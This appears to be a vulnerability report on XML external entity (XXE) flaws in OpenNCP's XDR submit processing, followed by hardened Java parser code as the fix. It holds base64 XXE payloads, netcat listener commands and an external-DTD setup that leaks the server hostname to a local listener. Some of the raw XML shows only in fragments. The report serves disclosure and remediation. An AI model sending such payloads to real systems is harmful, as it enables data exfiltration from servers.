XXE vulnerabilities in XDR Submit
*Case 1*: Calling external service
Using the following document content (xdr:document) in XDR submit:
{code:xml}
%xxe; ]>
{code}
And base64 encoded:
{code}
PCFET0NUWVBFIGZvbyBbIDwhRU5USVRZICUgeHhlIFNZU1RFTSAiaHR0cDovLzEyNy4wLjAuMTo0NDQ0L1hYRVRFU1QiPiAleHhlOyBdPg
{code}
Start listening on port 4444 ("nc -l 4444"), submit the XDR document, and you will get:
{code}
GET /XXETEST HTTP/1.1
User-Agent: Java/11.0.20.1
Host: 127.0.0.1:4444
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive
{code}
*Case 2*: Information leak
Using the following document content in XDR submit:
{code:xml}
%xxe; ]>
{code}
And base64 encoded:
{code}
PCFET0NUWVBFIGZvbyBbIDwhRU5USVRZICUgeHhlIFNZU1RFTSAiaHR0cDovLzEyNy4wLjAuMTo4MDAwL2V4dC5kdGQiPiAleHhlOyBdPg
{code}
For this, create an ext.dtd file with the following content:
{code}
">%ent; %send
{code}
And serve it using "python3 -m http.server".
Again listen on port 4444 ("nc -l 4444"), submit the XDR document, and you will get:
{code}
GET /?xxetest=my-supersecret-hostname HTTP/1.1
User-Agent: Java/11.0.20.1
Host: 127.0.0.1:4444
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive
{code}
*Problem*:
The problem is in the tr.com.srdc.epsos.util.XMLUtil class, in the parseContent(byte[]) and parseContent(String) methods, where a new DocumentBuilderFactory is created without sufficient protection against XXE. There appear to be more problems of the same kind in that XMLUtil class.
These methods are called during XDR processing in XDRServiceImpl line 572 (calling DomUtils.byteToDocument(docBytes); OpenNCP 7.1.0) and in XDR_ServiceMessageReceiverInOut line 182 (calling EadcUtilWrapper.toXmlDocument(...); OpenNCP 7.1.0).
*Solution*:
See [https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html]
To be tested with the following options:
{code:java}
documentBuilderFactory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
documentBuilderFactory.setXIncludeAware(false);
{code}
Also check XDRServiceImpl line 572: if the document is not valid (a SAXParseException is thrown), should processing stop there?
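As an added illustration (not OpenNCP's own code), the hardened factory below applies the OWASP cheat sheet settings and shows, with a constructed sample, that any DOCTYPE is now rejected with a SAXParseException which the caller must let propagate so processing stops; the class and method names are assumptions chosen to mirror the parseContent(byte[]) shape:

```java
import java.io.ByteArrayInputStream;
import java.nio.charset.StandardCharsets;
import javax.xml.XMLConstants;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;
import org.w3c.dom.Document;
import org.xml.sax.SAXParseException;

// Hypothetical replacement for the vulnerable XMLUtil parsing helper.
public class SafeXmlParser {

    // Factory hardened per the OWASP XXE Prevention Cheat Sheet (JDK built-in Xerces).
    public static DocumentBuilderFactory newSecureFactory() throws ParserConfigurationException {
        DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
        // Primary defence: refuse every DOCTYPE, so no entity declarations can be processed at all.
        dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        // Defence in depth in case DOCTYPEs ever have to be allowed again.
        dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
        dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        dbf.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        dbf.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        dbf.setXIncludeAware(false);
        dbf.setExpandEntityReferences(false);
        return dbf;
    }

    // Same shape as parseContent(byte[]); parse failures propagate so the caller stops processing.
    public static Document parseContent(byte[] content) throws Exception {
        DocumentBuilder builder = newSecureFactory().newDocumentBuilder();
        return builder.parse(new ByteArrayInputStream(content));
    }

    public static void main(String[] args) throws Exception {
        // Constructed benign document: parses normally.
        byte[] benign = "<doc><x>ok</x></doc>".getBytes(StandardCharsets.UTF_8);
        System.out.println("benign root: " + parseContent(benign).getDocumentElement().getTagName());

        // Constructed document with a harmless internal DOCTYPE: rejected before any entity is touched.
        byte[] withDoctype = "<!DOCTYPE doc [ <!ENTITY x \"y\"> ]><doc>&x;</doc>".getBytes(StandardCharsets.UTF_8);
        try {
            parseContent(withDoctype);
            System.out.println("UNEXPECTED: DOCTYPE was accepted");
        } catch (SAXParseException e) {
            System.out.println("rejected as expected: " + e.getMessage());
        }
    }
}
```

Because the SAXParseException is not swallowed, a caller such as the XDR service receives it and can abort the submission instead of continuing with a partially parsed document.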